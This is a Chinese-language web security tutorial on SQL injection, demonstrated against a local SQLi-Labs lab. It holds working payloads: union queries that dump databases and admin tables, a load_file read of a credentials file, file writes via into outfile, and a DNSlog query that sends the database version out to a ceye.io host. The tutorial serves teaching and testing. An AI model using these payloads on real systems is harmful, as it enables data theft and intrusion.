《Web安全基础》03. SQL 注入

@

目录

• 1：简要 SQL 注入
• 2：MySQL 注入
  • 2.1：信息获取
  • 2.2：跨库攻击
  • 2.3：文件读写
  • 2.4：常见防护
• 3：注入方法
  • 3.1：类型方法明确
  • 3.2：盲注
  • 3.3：编码
  • 3.4：二次注入
  • 3.5：DNSlog 注入
  • 3.6：堆叠注入
• 4：WAF 绕过
  • 4.1：WAF 简介
  • 4.2：绕过方法
• 5：其他数据库注入
  • 5.1：Access
  • 5.2：Sql Server
  • 5.3：PostgreSQL
  • 5.4：Oracle
  • 5.5：MongoDB

---

本系列侧重方法论，各工具只是实现目标的载体。

命令与工具只做简单介绍，其使用另见《安全工具录》。

靶场使用 SQLi-Labs。详情参见《WriteUp：SQLi-Labs》

1：简要 SQL 注入

SQL 注入非常复杂，区分各种数据库类型，提交方法，数据类型等注入。此类漏洞是 WEB 安全中严重的漏洞，学习如何利用，挖掘，修复也很重要。

SQL 注入就是在数据交互中，前端数据传到后台时没有做严格的判断，导致传进来的数据被拼接到 sql 语句中，被当作 sql 语句的一部分进行执行，从而导致数据泄露、丢失甚至服务器瘫痪。

常见的 sql 注入产生原因：

• 转义字符处理不合适
• 不安全的数据库配置
• 不合理的查询集处理
• 不当的错误处理
• 多个提交处理不当

注入判断：

1、逻辑值
and 1 = 1		页面正常
and 1 = 2		页面异常
则可能存在注入点

2、order by
通过 order by 判断注入的字段数

2：MySQL 注入

SQL 注入思路都差不多，这里主要以 MySQL 为例。

2.1：信息获取

数据库版本：version()
数据库名字：database()
数据库用户：user()
操作系统：@@version_compile_os

在 mysql5.0 以上版本存在 information_schema 数据库，记录着所有的数据库，表名，列名。

information_schema.tables     # 记录所有的表名
information_schema.columns    # 记录所有的列名
table_name                    # 表名
column_name                   # 列名
table_schema                  # 数据库名

本节示例见 SQLi-Labs Less-1。

2.2：跨库攻击

常见的数据库与用户的对应关系：

数据库用户A - 数据库A - 网站A --> 表名 --> 列名 --> 数据
数据库用户B - 数据库B - 网站B --> 表名 --> 列名 --> 数据
数据库用户C - 数据库C - 网站C --> 表名 --> 列名 --> 数据

这样做的好处是一个用户对应一个库，网站之间的用户权限与数据互不干扰

这是最基础的数据库模型，现在大网站都是分布式数据库。

跨库查询的前提条件是必须高权限的用户才能执行跨库查询。

跨库攻击，以 Less-2 示例：

# 获取所有数据库名：
http://127.0.0.1:8080/sqlilabs/Less-2/?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata

# 获取指定 qqyw 数据库名下的表名信息：
union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='qqyw'

获取指定 qqyw 下的表名 admin 下的列名信息：
union select 1,group_concat(column_name),3 from information_schema.columns where table_name='admin' and table_schema='qqyw'

获取指定 qqyw 下的 admin 数据
union select 1,u,p,4 from qqyw.admin

2.3：文件读写

获取的数据库权限会影响下一步测试思路。

高权限直接测试。

低权限就一步一步获取数据。

文件读写操作：

• load_file()：文件读取函数
• into outfile 或 into dumpfile：文件写入、导出

获取路径的常见方法：报错显示、遗留文件、漏洞报错、平台配置文件、爆破等。

MySQL 查询是否有写入权限：

show global variables like '%secure_file_priv%';

读取本地文件示例：

http://127.0.0.1:8888/Less-2/?id=-1 union select 1,load_file('E:\\Software\\PhpStudy\\phpstudy_pro\\WWW\\sqli-labs-master\\sql-connections\\db-creds.inc'),3

本地文件写入示例：

http://127.0.0.1:8888/Less-2/?id=-1 union select 1, 'test' ,3 into outfile 'E:\\test.txt' --+

2.4：常见防护

魔术引号：magic_quotes_gpc

当 magic_quotes_gpc = On 时，输入数据中含单引号（’）、双引号（”）、反斜线（\）与 NULL（NULL 字符）等字符，都会加上转义符号（\）。

自定义防护：例如 PHP 中的判断输入是否是 int 型数据：is_int() 函数，这种就无法绕过。

3：注入方法

具体示例见 SQLi-Labs。

3.1：类型方法明确

在真实 SQL 注入安全测试中，一定要明确提交数据类型及提交方法后再进行注入。

明确参数类型：数字、字符、JSON 等。

明确接受的请求方法：GET、POST、COOKIE、REQUEST、HTTP 头等。

sql 语句干扰符号：'、"、、)、} 等，具体需看写法。

3.2：盲注

进行 SQL 注入时，有很多注入会出现无回显的情况，其中不回显的原因可能是 SQL 语句查询方式的问题导致，这个时候需要用到相关的报错或盲注进行后续操作。

手工注入时，提前了解或预知其 SQL 语句大概写法也能更好的选择对应的注入语句。

可以通过查询方式与 SQL 的关系、注入点产生的地方猜测到 SQL 查询方式。

涉及的 SQL 语句：

select：查询数据，在网站应用中进行数据显示查询操作。

insert：插入数据，在网站应用中进行用户注册添加等操作。

delete：删除数据，后台管理里面删除文章删除用户等操作。

update：更新数据，会员或后台中心数据同步或缓存等操作。

order by：数据排序，一般结合表名或列名进行数据排序操作。

在注入过程中，获取的数据不能回显至前端页面。此时需要利用一些方法进行判断或者尝试，这个过程称之为盲注。

盲注分为以下三类：

• 基于布尔的 SQL 盲注：逻辑判断。
• 基于时间的 SQL 盲注：延时判断。
• 基于报错的 SQL 盲注：报错回显。

具体示例见 SQLi-Labs。

参考文章：

12种报错注入+万能语句

sql报错注入：extractvalue、updatexml报错原理

Order by排序注入方法小总结

3.3：编码

一些变量值在传递时会先编码或加密（如 base64 等）。这时手工注入就要先把传递值进行相应编码或加密。

例如 admin' and 1=1 base64 编码后的值是 YWRtaW4nIGFuZCAxPTE=

实际案例：SQLi-Labs-Less21：cookie&base64编码注入

一个简单的 base64 编码脚本：

<?php
	$url='http://xxxx/Less-1/index.php?id=;
	$payload=base64_encode($_GET['x']);
	$urls=$url.$payload;
	file_get_contents($urls);
	echo $urls;
?>

3.4：二次注入

二次注入一般用于白盒测试，黑盒测试就算找到注入点也没办法攻击。

以 SQLi-Labs-Less24 为例：注册 admin'# 这样一个用户。

此时修改 admin'# 用户的密码就能把 admin 用户的密码修改。

3.5：DNSlog 注入

DNSlog 盲注仅限于 windos 环境。能优化无回显问题。

相关资源：http://ceye.io

示例：

select * from users where id=1 and if((select load_file(concat('\\\\',(select version()),'.eii0i8.ceye.io\\abc'))),1,0);

参考文章：https://www.cnblogs.com/xhds/p/12322839.html

3.6：堆叠注入

在 MySQL 中，每一条语句结尾加【;】表示语句结束。

堆叠注入（stacked injection）就是多个语句连接到一起执行的注入。

应用场景：

• 注入需要管理员帐号密码，密码是加密，无法解密
• 堆叠注入时插入数据，用户密码自定义，可以正常解密登录

参考文章：堆叠注入详解

4：WAF 绕过

在攻防实战中，往往需要掌握一些特性，比如服务器、数据库、应用层、WAF 层等，以便灵活构造 Payload，从而和各种 WAF 进行对抗。

4.1：WAF 简介

简要来说，WAF 有以下功能：

• 内容审计
  
  截获所有 HTTP 数据或不满足某些规则的会话

• 访问控制
  
  控制对 Web 应用的访问，包括主动安全模式和被动安全模式

• 架构 / 网络设计
  
  运行反向代理模式时，用来分配职能，集中控制，虚拟基础结构等

• WEB 应用加固
  
  屏蔽 WEB 应用固有弱点，保护 WEB 应用编程错误导致的安全隐患。

WAF 的常见功能：

• 异常检测协议：拒绝不符合 HTTP 标准的请求
• 增强输入验证：代理和服务端的验证，而不只是限于客户端验证
• 白名单&黑名单：白名单适用于稳定的 Web 应用，黑名单适合处理已知问题
• 基于规则和异常的保护：基于规则，更多依赖黑名单机制；基于异常，更为灵活
• 状态管理：进行重点会话保护
• Cookies 保护
• 抗入侵规避技术
• 响应监视
• 信息泄露保护

WAF 对扫描器防范手段：

• 扫描器指纹：head字段、请求参数值等
• 单 IP + cookie 某时间段内触发规则次数
• 隐藏的链接标签等
• Cookie 植入
• 验证码验证
• 单 IP 请求时间段内 WebServer 返回 http 404 状态比例：扫描器探测敏感目录基于字典，找不到文件则返回 404

4.2：绕过方法

参考文章：

SQL注入-WAF绕过

sqlmap超详细笔记+思维导图

5：其他数据库注入

5.1：Access

Access，关系型数据库。

Access 数据库比较特别，都是存放在网站目录下，后缀格式为 mdb，常搭配脚本

asp，asa，可以通过一些暴库手段、目录猜解等直接下载数据库。

结构：

Access -> 表名 -> 列名 -> 数据

注入方式：

union 注入、http header 注入、偏移注入等。

Access 偏移注入：解决列名获取不到的情况。

查看登陆框源代码的表单值或观察 URL 特征等，也可以针对表或列获取不到的情况。

参考文章：Access偏移注入与原理

5.2：Sql Server

Microsoft SQL Server，也叫 MSSQL，关系型数据库。

注入方式和 MySQL 没什么两样。

参考文章：MSSQL注入

5.3：PostgreSQL

PostgreSQL，关系型数据库。

参考文章：PostGresql 注入知识汇总

5.4：Oracle

Oracle，关系型数据库。

参考文章：【实战】Oracle注入总结

5.5：MongoDB

MongoDB 是一个基于分布式文件存储的数据库，属于非关系型数据库。

• 介于关系数据库和非关系数据库之间的产品，是非关系数据库当中功能最丰富，最像关系数据库的。
• 数据传输采用 JSON 传输。
• tojson 函数可以输出 json 数据。

一个针对 MongoDB 注入的工具：NoSQLAttack

---

淡云孤雁远，寒日暮天红。

——《临江仙》（五代）徐昌图